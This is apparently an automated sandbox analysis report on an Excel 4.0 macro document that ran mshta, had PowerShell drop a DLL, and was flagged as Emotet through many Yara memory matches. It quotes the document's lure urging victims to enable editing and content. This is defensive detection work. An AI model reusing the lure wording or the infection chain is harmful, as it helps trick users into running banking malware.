                            Source: mshta.exe, 00000006.00000003.428066381.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.429429555.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.412759270.00000000004BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000006.00000003.428066381.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.429429555.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.412759270.00000000004BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,11_2_1001B43F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,13_2_1001B43F
                            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                            E-Banking Fraud

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 17.2.rundll32.exe.27d0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.25b0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3090000.27.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2f70000.23.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2880000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.880000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2db0000.19.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2760000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.860000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a90000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.370000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2e10000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2730000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2db0000.19.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.e80000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.7d0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.d80000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.e50000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2eb0000.21.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2900000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2db0000.13.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.29a0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2f70000.23.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2800000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b30000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8b0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.e50000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.c20000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.810000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.730000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2900000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8e0000.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.600000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2900000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.370000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2fc0000.24.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.860000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2800000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.29a0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.ce0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.880000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.27d0000.9.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e40000.20.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2800000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.27d0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2fc0000.24.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e90000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b00000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.28d0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d50000.17.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a90000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.28d0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e40000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2eb0000.21.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d80000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.700000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.830000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d10000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2730000.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3030000.25.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.810000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2cf0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3060000.26.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.7d0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2830000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d50000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b60000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.27a0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b30000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2830000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a10000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.26d0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.700000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2400000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.26a0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.ce0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d10000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8e0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2ee0000.22.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2400000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.10000000.31.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2db0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000011.00000002.664811796.0000000002D81000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510464737.0000000002CF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559443936.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510287777.00000000026A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665343860.0000000003091000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559926602.0000000000E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559812770.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664505889.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.562101992.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510322311.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664861198.0000000002DB0000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664965956.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664542338.0000000002B61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560189924.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559719503.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510432409.0000000002830000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663059849.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510167906.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665031499.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510522270.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.443244837.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.668746611.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.516180172.0000000000601000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560022976.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663136022.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664371125.0000000002A11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.515850446.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664216814.0000000002800000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665264578.0000000003031000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560265506.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510145612.00000000008B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663107682.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.509996233.0000000000700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559589643.0000000000291000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560140675.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664407337.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560066037.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664117517.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664190998.00000000027D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559766532.0000000000C21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510607759.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510494175.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664248445.0000000002881000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665204361.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664471765.0000000002B01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665308751.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510409215.0000000002801000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664297781.0000000002900000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663687755.0000000000831000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510379453.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.562204420.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664663684.0000000002D10000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663778840.0000000000860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664161641.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510352151.0000000002761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665168076.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.516839554.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665088679.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510556451.0000000002E91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510119980.0000000000880000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559961394.0000000002400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.562837454.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559901253.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560096641.0000000002901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559852842.0000000000D81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664763356.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\Milossd.dll, type: DROPPED

                            System Summary

                            barindex
                            Found malicious Excel 4.0 Macro
                            Source: DOCUMENT_2801.xlsMacro extractor: Sheet: Macro3 contains: mshta
                            Source: DOCUMENT_2801.xlsMacro extractor: Sheet: Macro3 contains: mshta
                            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                            Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22
                            Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. 11 12 13 Previewing is not available for protected documents. 14 15 Yo
                            Source: Screenshot number: 4Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 23 24 25 26 27 2
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. :: 18 19 20 21 22 23
                            Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. 11 12 13 ,, Previewing is not available for protected documents. L, 14
                            Source: Screenshot number: 8Screenshot OCR: protected documents. L, 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to
                            Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. :: 18 19 20 21 22 23 24 25 26 27 28 2
                            Document contains OLE streams with names of living off the land binaries
                            Source: DOCUMENT_2801.xlsStream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=....... Xa&8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-.......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......... .... ....... .......... ............ .......... ............ .......... ....`....... .......... ............ .......... ............ .......... .......
                            Source: DOCUMENT_2801.xls.0.drStream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=....... Xa&8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-.......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......... .... ....... .......... ............ .......... ............ .......... ....`....... .......... ............ .......... ............ .......... .......
                            Powershell drops PE file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\Milossd.dllJump to dropped file
                            Found Excel 4.0 Macro with suspicious formulas
                            Source: DOCUMENT_2801.xlsInitial sample: EXEC
                            Source: DOCUMENT_2801.xlsInitial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003600711_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004105011_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003130F11_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100323E211_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003046011_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004159211_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003E59F11_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003960C11_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100317E211_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10040B0E11_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031BB611_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10041C5611_2_10041C56
